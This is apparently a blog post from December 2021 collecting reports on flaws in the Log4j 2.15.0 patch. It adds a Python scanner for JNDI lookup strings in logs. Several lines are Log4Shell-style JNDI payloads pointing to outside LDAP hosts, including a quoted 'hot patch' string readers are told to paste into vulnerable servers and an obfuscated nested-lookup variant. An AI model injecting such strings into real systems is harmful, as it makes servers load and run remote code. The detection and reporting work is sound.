Thursday, December 16, 2021

Log4j Fix Also Has RCE

Dan Goodin:

Now, researchers are reporting that there are at least two vulnerabilities in the patch, released as Log4J 2.15.0, and that attackers are actively exploiting one or both of them against real-world targets who have already applied the update.

LunaSec (via Hacker News):

After the log4j maintainers released version 2.15.0 to address the Log4Shell vulnerability, an additional attack vector was identified and reported in CVE-2021-45046.

Our research into this shows that this new CVE invalidates previous mitigations used to protect versions 2.7.0 <= Apache log4j <= 2.14.1 from Log4Shell in some cases.

freeqaz:

We also wrote a Log4Shell payload that will in-memory “hot patch” your server against Log4Shell.

${jndi:ldap://hotpatch.log4shell.com:1389/a}

If you paste that into a vulnerable server (or even throw it into a log statement in your main function), that’ll patch you against this until you can manage to update properly.
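Before applying an in-memory patch or upgrading, most defenders first want to know whether JNDI lookup strings of the shape quoted above are already reaching their logs. The following Python scanner is an added example, not code from the post, LunaSec or freeqaz; the Apache-style log lines, the `example.invalid` host and the line numbering are constructed. It goes a step beyond the quoted payload by first collapsing Log4j's nested lookup syntax (`${lower:x}`, `${upper:x}` and the `${...:-x}` default-value form), so a `jndi` token split across nested lookups is still matched, and it ignores unrelated lookups such as `${date:yyyy}`.

```python
import re

# Constructed sample log lines (not from the original page). Line 2 carries a
# lookup of the same shape as the one quoted above; line 3 splits the token
# across a nested ${lower:...} lookup; lines 1 and 4 are benign.
SAMPLE_LINES = [
    '10.0.0.5 - - [16/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [16/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid:1389/a}"',
    '10.0.0.9 - - [16/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://example.invalid/x}"',
    '10.0.0.7 - - [16/Dec/2021:10:01:11 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

# Innermost lookups that evaluate to a literal: ${lower:v}, ${upper:v}, or any
# ${name:-v} / ${::-v} default-value form. Group 1 is the literal they yield.
_INNER = re.compile(r'\$\{(?:(?:lower|upper):|[^${}]*:-)([^${}]*)\}', re.IGNORECASE)

# The lookup prefix Log4j hands to JNDI; case-insensitive on purpose.
_JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Repeatedly replace innermost literal-yielding lookups with their value,
    so '${${lower:j}ndi:...}' reads as '${jndi:...}'. Bounded to avoid
    looping on pathological input."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: m.group(1), text)
        if new == text:
            break
        text = new
    return text


def scan_lines(lines):
    """Return (line_number, normalized_lookup) for every line that contains a
    JNDI lookup after normalization. The snippet runs from '${jndi:' to the
    next closing brace (or end of line if none)."""
    hits = []
    for n, line in enumerate(lines, start=1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if not m:
            continue
        end = norm.find('}', m.start())
        snippet = norm[m.start(): end + 1] if end != -1 else norm[m.start():]
        hits.append((n, snippet))
    return hits


if __name__ == "__main__":
    for line_no, lookup in scan_lines(SAMPLE_LINES):
        print(f"line {line_no}: JNDI lookup {lookup}")
```

Run against a real access or application log by replacing `SAMPLE_LINES` with the file's lines; a hit means a lookup string reached a point where Log4j may interpolate it, which is the condition both quotes above are concerned with, and is worth correlating with the version you are actually running.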

See also: Bruce Schneier.

Previously:

Update (2021-12-16): Rosyna Keller:

2.15.0 only had the DoS and data exfil bugs. 2.14.x and earlier have the RCE. 2.15.0 has no RCE. 2.16.0 fixes everything.

Update (2021-12-17): log4j-scan (via Rosyna Keller):

There is a patch bypass on Log4J v2.15.0 that allows a full RCE.
